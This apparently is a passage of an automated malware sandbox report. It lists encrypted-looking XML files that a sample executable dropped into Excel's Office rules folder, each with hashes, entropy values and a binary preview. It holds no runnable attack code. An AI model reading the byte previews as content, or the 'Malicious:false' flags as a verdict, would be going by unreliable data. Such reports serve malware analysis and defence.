                                                                                                                                                  Preview:<?xml.-w.r| I.yG..[T.../.........H7").-.=............ta`.....W..]..`-.......>.....5....1...j...3..W..A...8.].(......%:Xs.r.J......R.....c.f..2.^0..(v....g0l.:..{M....=..Q.xJ..K...|....CIb.V.8sb. &..2..Q....^.661.{.`....O...../X.xVg.GA.........-...........D...7.{.....?.7`.S:.b....S.+......x..TLy.F9..R'.:.....s.r..Q.E..m.yI......C.t....Q...\b.*6t.D.f...4`-.l..{+..............b:....Z....;@..k./.8.v..>E..l\.EL.'..g.7."".X...N.l..~|....2.,.........h.....P.h...{1(.>..'..#|pS.n...K.....N{..G.Jwo..%....#..Ct|B)...v.........Vx..A.#....&Mn.....Z&T)<...2e.....!.6..b..Bf.]..\.]..x......EJd.[._..........Zo..|..`.K.....v.V.....l..Pk..6..I6tV.&."Y.........-g. 5..UXNr.......G.92:.....Yi..7........$..Vd)uB.......J..'_L<{g.G.o....g&.u4..A.../.7...Dp..?iG.zIL..F.......9...uZ!.7#....>#.J.w{"UE\.,...[...EM.Y'....?...B.J|7[.....n.m4&.J\S..a.z..e.MR..p......#.pCQ}..D......E-..d.d.....6.N*...;..U_.3..E0\..J.f...z.B*.m.A.7..:|!..0..G}..OC......~2%A.......Y..A.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v5.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1108
                                                                                                                                                  Entropy (8bit):7.795011544424557
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wOSduh7Naq6iKTr8jjIt5iVXt/Btw2xyLPXBUVE6ZOt/2bD:wOyuPbnkLiVXt/BtvoLPxUi6wGD
                                                                                                                                                  MD5:F8384C0278E70CD8D15442293823F452
                                                                                                                                                  SHA1:37AAF330B0278B7175B969F6668E1A22D1032406
                                                                                                                                                  SHA-256:F50DD904A26C7267DA71FA84D628BC21F031A4D8ABE7EC2E6169CE749A98BB50
                                                                                                                                                  SHA-512:5EB3CFFA2DDC83F9EECF1BD8A7648EF9159E04CD36413E6A8E0D7F1830E994B5F31220392282B8AF7B0267BB2ED90824A1D3253A87A2BABA7D390495EFCF268F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlM.. ...3..K...W3-.,.iSi.J.^g.j=...p..,.....$Q.X[(+......K.N..1..+.[FM,........;.>.3..?.#&....o...[...],D.~.Uo...#.,./..`....s.i.;.U.#Qso. =...8?..{...T.0.SB.r.OE....$..Z...V....*....:.._....$..Y#h.VB?.!\h8..vRc....[.r9..q.2......{..5f.3Q5..^c5........d.Y...o@..5.U=.l.z-RB...,..i..c...vB..?....iK...j.!..Z...`.H.]?...i'.9..~K1.G-.Q..5.i.1..?...^....P=..{..(.h...^g.k...G.@..+..s5....y..J.)..c.3.=&#M..V.z^..S...e4$..S....h}%S.V<{..3.-X.%.2..K*.....8.Zfq7|.^....:.....qu...v...iI......&%.Et1....sw.a.S..7.h.g.O...J..y.....A.-.jmrR..sm&.....R8....!p...t,S...j._.?%n......~.Z.N.O..+D......".....e(..Xwh.<....c.(..y..(|D...8.@...G....FE.._..?...........[:k.^pp....OKgi'.|@:..>..A...A..Q.wo2c....<..6..~.h.?...u.A.................^...J....;.9...5.,hI5(7..x..a..U.Iq$i....Ll..?..Z{...f.8......( .?.x..q.8.wvN...8{.3.......J.CN.....`1.....s.......d...Q.n..&...rkx..A.B..3^..$...\...1}^.v..^..k.I.P...}.X...}...bn8..A}...o..+dD....u...t*._.$.F

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490018v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):934
                                                                                                                                                  Entropy (8bit):7.784996710902584
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:3VrSYr3/dWOMxdXj2AdlNYZ/z4qwu9flGFK9X2bD:U2/dWFltA/kqwslGFvD
                                                                                                                                                  MD5:8A268E9AAD4041BDCB80821DBE945256
                                                                                                                                                  SHA1:FFCBD765311DB1E2ACA49D33F8A6101782D3F7E7
                                                                                                                                                  SHA-256:6D7AD248CAA770D9B6B77CFB7E854C9D0CA299C38824684E23F6EA301DF51BB0
                                                                                                                                                  SHA-512:F018558513D3AA5F5E7688F869FA307F89F567E6C5FB2C79E85736D80C83760DB0312D99BA99618536D02A04C03CF82CF696ADFFDBC99D132145E404BBBC2DCE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...d.1..<.Y......a!."/6.?....a.0D..bgNq.s.s.%.x...I1....S ..lr...K.af............CK.5.4.N.:....@@..C.f.?.RcbT.Y.r.s.J..z......:.11.....[/E.......Rb...<.Y..7]....{..._,..g.6.....6..B<j.."..#.....[..uE.....!C..7m[#XW...../..<.j...U.Na...o..k.."4..;.}6......t%GMw....P.EPC.....5o.CwRA.hS.....*...(bnb......49..Wo$...+F`......L..../'..._..X: ...t}0+9.|..aO....s....-a...-Ka....WoUy..a..^.Z,-...T..E..=.j.....u."b.x..N4.:-..)..L.RW....f..6 .=!.....v`..).X.@4a .E..(.C>...}(.Gi..h...>Ao%O...uq.W../.\m......g1U......O..RH..d.Lh...4....0. .QA.....8....q...$..t.i.......CPz&...9.0.=.3..../.Z..l.t.e.M..r.......p..$_I...J..Y ....,....F>....,..{7.v.)...$..J....x.....M..Yct|/..iRWi....d"n.r.v.R+'.?U.y..%.%.. u=.V%\Y....".......@0..].....ol[......x.,......g.w..i...._..$EBu{...M... ..P~Y....9...L..~R....e....:..?.oH..V......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490020v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1126
                                                                                                                                                  Entropy (8bit):7.817526770759459
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:whGloBb6pFlOLLqvpkhLn5KuBnwY+q1AYYk92bD:whlBeFlcSpkJ5xnwYM1LD
                                                                                                                                                  MD5:9BA6B11C3DC6242D64D5231CFD7A5AB8
                                                                                                                                                  SHA1:80351F48BAD7CCC34FA97A9B3C862618536D515F
                                                                                                                                                  SHA-256:8D25AC035F1B86EAEBF7A5CA5FB611DAF9FFEE27BB813FCEDA03C36F668D3CCF
                                                                                                                                                  SHA-512:1BAE00F5D7112A5EA33EB01E45785CFD8244BFDB62738EFE5F6575BCFA39E2F9F4DF3E949B652026EB5E4CE24F85650A405CE780E171E272B0EC2B70460DF2D4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..oX.x....g.|.TK...M.~5U.._...p...L^.W..'....o....W..eo..F!..&E..7./He.I.3i.S.oi5wh.=I.......8R-._..3u%..:.(8..s.8.....>.W.d....h.Q..DT$..(.7...|.[H%...(....|..7..c%.z.~.X....S|.......l7..=.'%B9,%...JuE* ...l7.x.+@$.ix."..I.@\./..,.,....9....'.?.B...}Q...a..R:E.s.Mi.%..W8.(.....w.....l[...b... (..+c.b>.i.QE6.f.7.U[x.j1+.@>.Vt...T..W.Q.jN.../..]...!.,..Za2..z..e.C..;...E.3/..._...q...ui...H...*.v.(..........y'?...?R'.q*...<NJ....R.Qc..1...63....K.....o....&\...':QB1s_.D.....KH.D.r....Zo..$@...2.......$q....s^.u.g@.....9.7q...X.x..N...J.....h9.d.N....n..)q...?..YJ.9..8.......=.5........"*.}.......8..'.]p...'0!).P.F#a.>U._e^.^.;.X..a./....{........<...ZG..F<.X[..Q......e..)~h.*Tu...q.~"....|.Xt.4<I..c...QZ{.V...v._....Z....@_..IPN...e..}..Z..=...7j...}a.W@.^.y[.fI.i..h:l.@1R...z.@....~..}F..v.MU.....wM.p..TYA/.N..,Q..I.....p.y.Ml...+=.D..4S.p...?SCcsB..P.A..N.U.ag..:......"...z.RV,....N.....k..!..-..Be~...f... ..G.'..vJ.8?lp.....1Dw..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490023v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1243
                                                                                                                                                  Entropy (8bit):7.833613667957596
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:klqTrnf7Jmi7FHspJQIpqxyRoxBQhwH/tm2LEciqW6bXVSAunv0IJk0u2NuTHr2X:Nj7JmOw30xZRFxY6rVSAg0IJ62NuT4D
                                                                                                                                                  MD5:0445DE363D630CA106F0CD507AFD5859
                                                                                                                                                  SHA1:CB06C79FCCD9B8DA53657DA89F78446BEAEE2E1E
                                                                                                                                                  SHA-256:7AE66AAAA4CD030AA6B90B54EBB6E3460F462D066719A7595C964BACB54A7E93
                                                                                                                                                  SHA-512:DE21D0F70CA0AF4036174252A349D235A050EFE3E2799CC9FA0F2D96811A37925FB83F21459193E3D8D27A63CEF936FB34E0D1A688C3A0F9D284CC59A4A9B8B0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....1Q. .Y......C."##:Y..Z....c.x......|./..&........:...mh.&h..%....:.s..H..".....&.I0*.:.qRca.\.l,.....E..{xcav........k..}.jY.{.?1V.M.p.k..|...g../v.l...UR...%.q&.=>..J..X].>..g......P.HD.AL......4w....j....B.......%*.,.X..}.#..gn.<.k@i..>........&...d..,y.....i.iH\....{..#4...r.&O.2>Js..w.g^.!.T....I..J..A.,...$.....1..t.3..T....l....+..e..l...l.D.s.].(.s..H..y.......!.&..I.B>./...`.N.!.K......i.u.mQ..]7..V.Y.*...!{.F..},.xi....A..bB1vY.F.ZEu.......'NH.Z.P....r.P.%.X.}..`q....$i..W`.{%.}..^......-..[..}..\Z.KEf..Y.....`..1.?Pf.[.g .. g..L...v...U...J.[LN...S...F<....J.R[..l..V....K.....sg..(!..B.......S{..u.r(......?~-..V-.w.~.,...Nj%...E.q(!/..b}.{...^..dQ..&...K.(.$..P.L.)n.1."u..:...oP....5.....f..]M............n.1O.`C.Qv.^HNp...5V.. ~.... ....P.).M...r.q.._...z"..[.O%.x..yL}Q..t8..g*^K...F..4.2tD.......-..4...e....i.Z3.Bz....L..S..1E].0L.l.8.W-%..U...b........=.....h.*<f..R....-x-f.T..aW.?[..y...w..Ki..Du......k..@.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490024v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):871
                                                                                                                                                  Entropy (8bit):7.714524551667501
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:+MsuNIKjru64lFuN/0s1i6Nn510ssi7N5NqRSzX+71ZBhEiP4jXdiM8gJmoMSUdV:tvvuJmN/hi6H+sTd0BhEi+N9x8oT2bD
                                                                                                                                                  MD5:4A3C1D6F7E49DCAF9865FE1E781EEB04
                                                                                                                                                  SHA1:5D592E053F64A03148A36C01E36F1DF82E190917
                                                                                                                                                  SHA-256:BD21B033E18853E62507753BA6DB3C00BF0731420C3DC0740B1F6CCD8923B85C
                                                                                                                                                  SHA-512:C0BC75F581B97F59D36652E3F8CAD48AC1CB10353189F6C5ADDBBAD321D26DA0FA39ECEA83C968A063EBB12EBD18F9F77CC018171AE604CCC9594857B76736F1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...b:.4N..T#..P.........s..as.1..kd.0>d').`..R...2[;<..K..G..........`{.G.."...k&.l.......l.5).;..u|..7=.1.....4.?".x...z...].S...ie...V......T.......x.f).$SkYz<}....B.tLy....&''6._.foF....c....#.]).M{..D...Z3F.Q.i6L...Y\.(f..^..._.ya..Tq......{'..b=gI.^n..@..........u..3~Q...'..eU].{...T.12....]..Y..l.*c..FS.<.7az.ib.@..B......k...?....LX.:...R.A...0....\....Q..SS..B.F....@...:...)...*P...5y...`.:.].As.,..U...h...e..mZK..Y....{d[=..;..([..`x.C..-Y.n`...........B...;.%.O.C<..d..9...q.>......#cc+[..9...P.fj7>...R.3.'..>q.....d.>9.G..M.@...,..PlIk.$.{..y'*....9s...r/<C.l.k...L.]...i........m.\....A]6.U..V...s]gqO......'t`.m......;....wjN.....lV..c...7.,......'.m..\.7Q...m...........n.......Lp.......*.W.Q..7.;..j.jq.Gd.........~2.D.k..tB..T...6..2.l...6BmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490025v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):866
                                                                                                                                                  Entropy (8bit):7.7457513513893765
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gNKsVQCmmqWaSHxh1fnSjwybx8f4AgJ/XhA9cqUNWEu42bD:iWmxLfn1KxVJ/XhA9U9yD
                                                                                                                                                  MD5:ACEEB1B188C69C94E402F127E7E11711
                                                                                                                                                  SHA1:815C3D6C60C9286AE5C80942F0D219DEFAAFF196
                                                                                                                                                  SHA-256:A33949AA8FD2A18576FECB256DDB6B87B5AC80EEA89BCAC7A1281221D3C702FB
                                                                                                                                                  SHA-512:8C5B0BC59FFCB9115B2E1719EDECDD254E377B9720B9AA61F787F30D6C322507FD4D93C81A33C4619F4E1D46E4F50D6795374BA12752882756C977A663C6CA12
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..$.-.ux........E......W...*..a...}!Q.m.d.s]...H..2hH.!..ab....,.Q........&."/.G.u.G.(.S.g....`^..f.P.!.&.".n..g..n.Zp..6.l.d.V...>I./c-WdDp...VM./..$.m.}..^P..V..B*..|..-|q..[....._.83..`.g.z.wh.K...*.._.,..8........Y.\.....)rh4..1...'.J.L..3d.R..m..l..N../.`.....cf....0~.w..WZ......w...=....|...:.yB.gyzH".VE.J!.$.H.t..]...|H......._..I).....y.y..(JB....Jt.A...J..PW?..G...-...)......h..ml=.......n./:.....8A.].7~Z..Cj.cq.4.5......T.7}....7kF.....v]..*..j..%.$.`...q.."...._.}S..1....y.n..y"g._.....Yt....cO#.....t.|.>.1...z...N....=...._.Q.PN...V...i.(.....*.,.BF..hn...W.JA.ACe. .,.-.>.1...0"G..d.,..W.4..n..%.+y.F.w...4...m....\.....5.X....."..s...6....N%...q.....!V..$..<2?zMaz.... .ih...B.@y.Yx.._V....,.I.......>ITe.|.m..4..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490027v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):860
                                                                                                                                                  Entropy (8bit):7.7450312532059895
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:m2gvxu9gVJILLNkbHRq0h3ek273nBo2bD:mxQwJILLNIxql3BbD
                                                                                                                                                  MD5:8147B4AEEF4F2ADED51370C0B1B6FFF3
                                                                                                                                                  SHA1:8D94CEE81E8D4441B3ED0CC798D9241CF902FA58
                                                                                                                                                  SHA-256:3FA421750FFB6ADDFB2AC3685DA39A60D31693FEB060A20E392F2AB214D27A8A
                                                                                                                                                  SHA-512:0AC4A05A50901FC24B730D5C46699807985252A6B02F331E1A7D03E489E9FE2EEA07EDA1D4586EFA079EB37CB6215015BF604D9076AC8E4A27CC7CBE647CF326
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..$tb..Ca......#.u...~g..KU.F}.....O}k.r..u.'I.k2PT..E;.4I..X.I...2O..{...fM.."...\..+..`-.......&M....-d.{..........a[....y.W<...s..=..#2.h.Bo.....We.:p...Dy...T..U.};.g.'k.i.[...........-..X.W.*...G..EO.g.B_..F).....[.O.8)....V.w.h..R.p[.6.h..$0N....cl...]i.+........].....l.aX...N....z...m.<.=..l...R.`.... ..&T..W.._{...*`...5..'..}.H...p....=...f]...=.].d2c.?1......V5....#;.0......Y;.)...!...O.D@. %.m..<b*.l.H}D..;IL..\..$._.J.Ze.+-.@.+|N..]tT.>.G.qpu..zn,&..w....yz..N.A.X.......o...=.E.?c.3j..p...Aust...9v.U.u...w..Tl.>.Q....!.....3\8.|...Z.N........P.Tb..7..(....sc-|F.zH....p.?;....F'5|qo.!..a..t6..w.>x.#.Y>c.d^.E...4:k..O.~.G..Aa.?.$....w.&..k..c...$..~.!b......gi.lZ....9E...P_...9e....QW.L.......n}.Z...A).[.(..F..v.!.|C)...?.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490028v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1057
                                                                                                                                                  Entropy (8bit):7.795843228913303
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:aNMN/sfUBNphyE7OnAEF6QacaIJq8IsD2bD:WMNaUVhyEqn8QvvqRZD
                                                                                                                                                  MD5:AC267825969609535C866BC75CC8FE25
                                                                                                                                                  SHA1:5A285A5E58D7C184687264E58201E4D941E19B36
                                                                                                                                                  SHA-256:38854A284C5FBB71161E545051F16B8345348277D86BBA475156FFA1C90CB027
                                                                                                                                                  SHA-512:018DD62D1041858FF497AAB3245A96CB90C2848ACC03ACA83CEEEC4DD44CBAF6D45619C2C3B00FBFD0A8FB0B5A8497D11915C6708502564552B02B70B896B86D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...4s.1.A.2)....<$.^...>.n..e.XJ.eQ.......Z.|.?{z.E&-...S.D..rzw....b.hO..Bf.b.$lF@.t..F..I..(.+.h.Y.........?.&..SQ...K..DX..^..V/....r"XI.....O.(G6...i.#.1.....q.....t<9. ....]...:._(n..M7..C...w/..../.U...OW.qd..M../'vT@09.s...^..l.:2.....%...V.mP....m....5.b..uG..I.4.T...{x.^../.O../..}w...~.F...%..5s$A....'..9.!\.zB.......K.s..k......+)E2.]ge...g....R..JcZ0..ir...H.qb......=...x....E.M.4N...M?._D..d..m....?4..s.z...V..Z^....-...57D&..u..D.KI...".V.:....3..).Q.....p...O.......l.|... .a.l..e.o.M.\I.^y.c..Pw...:.....X-...F...X..W...''|......!.B...^.{..t.......t.J...>o...m..v.m..-?....n....]_.:g..g..r.,..!.....8.lLzM.n.:.`~.{.;......?....z..4cY.3.b.._..9e.?}.e.>....|.H...2.I..O....M.:...la..o[..H6.gz.*B...X...E..i...f.o.W..|.9/..$3.T........|...F......0V.....#aH.P.a.....,...!...@So...>.G....?..A...a$w..xwN..+...$n...8+.6.?ED....@.......%..Z.....qu%.,....|P)...<q...4.p.pn..x[/~...ql%#.(...$."..M..0m.dBmMsRxMUuXypapZbGOAfxD

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490029v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):766
                                                                                                                                                  Entropy (8bit):7.716566289045153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:YiFS9tKziT963P0e7BGS9PG9yt7DO9XHdR6ogKP0f+52hFb0RBH9QiDf0xHI5SUn:zZD38eVGX9R6oA+52hFQHzyB2bD
                                                                                                                                                  MD5:C376115B260B9E95B06EDE1C70D5BB27
                                                                                                                                                  SHA1:A96C6C8204D3F3C4D3B724918033BFB132CC28F5
                                                                                                                                                  SHA-256:5B52DAD9C780ECD9DD2FF41CB4817DB34C5B1D963687163258465A5937023673
                                                                                                                                                  SHA-512:F1D09693194F5331C4826FD49BA45A8817BCFEE1A4DFDC02238E41F3F9A849EC720608EB8AE36E92502827C9340CF170BA39A4791540CA8F4ED55FD2D94DC384
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml[..-0....(.Y.6<..t.....j..c..v..pw.....O ...B&....c.......IV.......e..S.../...i.91...w........q}s..<..V ZV..r$q..U.N.l);.V..2...R .g..hi(....X..$r..%.y..RP.qH{.K=...ml,.xoL.....f4v..q.=.=,.....z.".t.\.P..(l~Q.Y..g..F...@ ...@B,.E..........]6..&x.<...g..h..w...2...E$.*.^@U...ye@tMU.r.....[]..NP...;..(....Ha...(R....ahB.&.H.S.........j.f<....0.>.a..5./...B.P....Q.u....#0*.W)...!2p.5X...9.<f......"....<.AFM...'..j...g.[.&....(.D..K.^...q5...{._I.'c....Ke3......#..~..Q.kQW....F....[.B+%.<C..jd.O../@.h..,..L..G..H6..@.j.....[.u...A...pF.o....+.f.0.f...%..J$y..k3...U$....Vj.I.....G...A...&[.. .e... F.H..4...k.Z...K..GF.."....N<4.u.Z.6...&Z]l....+.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490030v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1037
                                                                                                                                                  Entropy (8bit):7.791721571439862
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7cvcNG7TOXPZiSSmwjMBpCXvolOeWsjPttz8H0c2bD:73NG/OXsEAMBkA4eWUJGQD
                                                                                                                                                  MD5:9323379A7338A10982F46B54A42BAA77
                                                                                                                                                  SHA1:5298C294D58821524DD025E6143E422A8A7A8E61
                                                                                                                                                  SHA-256:ABCF8932503D2677A811DD8E32F0AE41FFC12D77547189036E064DE21559D8D2
                                                                                                                                                  SHA-512:47993BEB6507DC7A6519AF41827CBB54A29E24695C98707C5DA3A7224DC095357095BA1DEDF1F4FBC160EA24E2E01471EA1EA557A711899F4720C296450EE695
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......\..B..a....b.E..TK.S..D~..d.%V...rC.v..<j2'..T]..\.......M.. o~VR....u.U.&v.lC.t.F`.?|.U.......=.o..%....Z.".....%.a.].n.?H....E._.k1+....[Y.....L.V......&.CTV.d.q.Q.H..^@...4zU[.&...C..@.`.-....D`.....#T.,.~}...U.).....I..JS.2;... ...V.Z......K.X_.......}{..R/....\~d-qT..;..n.U.3)..)M...J...n.H,.7]..HIX.8M.R."c..e..}/-.UYeq4.6.....__yK.R5g.4...0..J.]....,.!.....Y.?...W..*.k.......#!_c.9"V`...MG^...7..=.nA...R~6.dF....L.;../...+.T..(p..&.>.h.P.....L....k...&...r....,_.s0T.1..>..H.o...e.x.X2._-..$... ...1.G...U@@k)...>Z?.PM.V;%......A.D......\.[.....k....O.#kXS.0..}>2..{...yy.L.Ti.m,.|..U....\.9y.......O;.....?.@S,t....K..-.08k.g.g.K[...8..e.C.....5...De...Tm5.#..l.....s.~yF...[.&........%..S....S......^...[!q.)[..P.(.........O..LV.5F.K..t. \.....r..K./.........Y......3....m........."..c..72..a?..E......(.3W.z.@.@......8...Z.."..s.T.n...n{j.J.n..A1..+.....-....#....T ...&........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490031v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):920
                                                                                                                                                  Entropy (8bit):7.735868768351999
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:sCZKIvOHMsiuRHutGdacY/pVXAUhIsKsp2bD:sgKB1lu4dlojXx1KD
                                                                                                                                                  MD5:08B054B520CBDF2A1D3F35E22D6C67FA
                                                                                                                                                  SHA1:75DB3BC179D97C1FC98B93AC061E7F04438A5D4E
                                                                                                                                                  SHA-256:CA0D40F92F62B64AD81CEBDB1F7AC3DBC1F8D28650F54C2B78CA9026E2EE7504
                                                                                                                                                  SHA-512:41FAAAF222C60C3F9B644169FC06DB581F31D2457B04EE507061F9E9BF22078FA4643BBD309418433BA573B36B4F85023A797E7CE165D1822852C4D45FDE58C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...9N./8M.....Y...M.@t.XAR*..C....k...~d.M...p.Y..M...m.%a.A2.//.?..0.l....5..1.g.......`..(...f..;B.<;.e7.r.....!.....O...t}..w$..{kN.e....QT....Z.}.I....D.,gno^..;.seA.+...A.I*....|....W..D....e..8....'...(Vnaj...J..fu......;....(Z!+....r..^...L"^.......T.F..),...8...k..aM.i.o......s...sa. h.Rv....^.i.Rt..l.se...<X.qkl......b.,}......xr....P.....k.(F~...J..#I84..E.7..v....\B.:.].".[...U.{..U..j...T.....`!..2..8..w.V{r(o.|....2<...k.'S.5xs...i`q. ..O..9.u.. ...,.qN.k..V\.d...#..T..*<@..#....zM...}........~.R{e?i.+.sx^}...lh`.:.}#..A.-.V..Aq....U..]...\.yr.4.....2....'.[A*!W.'...J.u..v..Y.].fu.p.t.-q.xf...q~.(.Y.j.s..]R.jV1E.K..V.......!.".........qtst...R..b...R^$.W.x.W........k.....=.G....../.........@.....u.JGl.........m..k$."?c.......=6.gG+..Q....n.yk..h.X,...@.)..s#e..q+mq.....7V....^8.}.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500000v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1147
                                                                                                                                                  Entropy (8bit):7.824122709615378
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:B6RHsYJ3nJgy7N7RvOvkG6+0lpZxNNk801DV/WwNnfSR0g/2bD:B6R3J3nJgyx0kG6+0h1z09V/WYQ03D
                                                                                                                                                  MD5:C75DE63797B1E1B08E99009A1090F0C1
                                                                                                                                                  SHA1:3D32D27F7738D15100035DC8A4E03A037009B0F6
                                                                                                                                                  SHA-256:B720AAB502D559A357A92B1C49DEC208B98FFEBA39553AD8A1958DF941DC7AA0
                                                                                                                                                  SHA-512:4BD5B9AE15C0EACDC24C61DD303F27DE47228D66B183220FA5348E1D8ADE85A4570DEAEC8D2C95D6E75D65E1211E65F37AC5DDE69D7B7EB322A759BD9B842F86
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......b....98.l.6.*W....i{K.a h.H/...{.Aq.ny..28_l....t.D....(...@...n....a*..Vu.Y....LsT~v$TKc&.`@..^.Fn|...\<..r......lcWH.}.^..$o......m....m...._wz Nd?.m.D...q..\.....?..<..-........[..M.Y..V....)-/...)3..c...t.Hk.j.vC......?< `.C.m..E).b..^.9~uw...~k./.U..../..an..$ ...>. 7\..E.j.WbE.E.0..`.B..;..&.......Y.U..||....s.=2.=...N...Zq...vJ...X.........z......."...5.W...y6..r.0..7.G.V..o..^....+...E.B.&..h.9..F.j<..._.....3..xd..^3...........1;}..._.%|.....X....T>.......o...]...'../f..{.T.]......,.5..~.......{..}Z......P...............A.........,UK\.1...... RW'.....4.U.....5k...G....j(h.TPJm.T......P,c..~..,A..l*...?P<....N...n.qX......Q.-n.45k...BEh.V..S:..,%r...8:.d...i.{{.z....*....#.....Y..>....7r.D:.Gy.4......,".Y...K.{....#.0.4\S(+.c./N..x.vt.....V..j.~.0..v...K.,.Q....4.\z`...V.....(.......!:.&..j|X.........4j..E5.6}.P..x...,..,5..+.},.V.0..q...8....0..H\.a....L.1....S...{*.`/1P.S...tYOc...]...eh.S.u..j7.O.t..Q^..s..hh

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500001v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1141
                                                                                                                                                  Entropy (8bit):7.838357067469501
                                                                                                                                                  Encrypted:false
